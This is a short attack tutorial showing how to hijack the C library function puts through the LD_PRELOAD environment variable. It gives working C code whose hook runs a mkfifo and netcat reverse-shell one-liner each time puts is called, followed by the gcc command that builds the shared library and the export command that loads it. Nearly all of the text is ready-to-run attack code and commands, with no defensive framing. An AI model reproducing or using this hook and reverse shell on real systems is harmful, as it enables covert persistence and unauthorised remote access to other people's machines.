Abusing LD_PRELOAD for Reverse Shell via Hooking Functions
The puts function is modified to perform lateral movement and compiled as a shared library (.so). When the library path is provided to the LD_PRELOAD environment variable, the malicious code will be executed every time the puts function is called.
Here is the C code:
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int puts(const char *message) {
int (*new_puts)(const char *message);
new_puts = dlsym(RTLD_NEXT, "puts");
execl("/bin/sh", "sh", "-c", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 666 >/tmp/f", (char *) NULL);
return new_puts("DEPLOYING...SHELL");
}
To compile the shared object:
malefic@xccvltvm:~$ gcc hook.c -o hook.so -fPIC -shared -ldl -D_GNU_SOURCE
Then, set the LD_PRELOAD environment variable:
malefic@xccvltvm:~$ export LD_PRELOAD="/home/malefic/hook.so"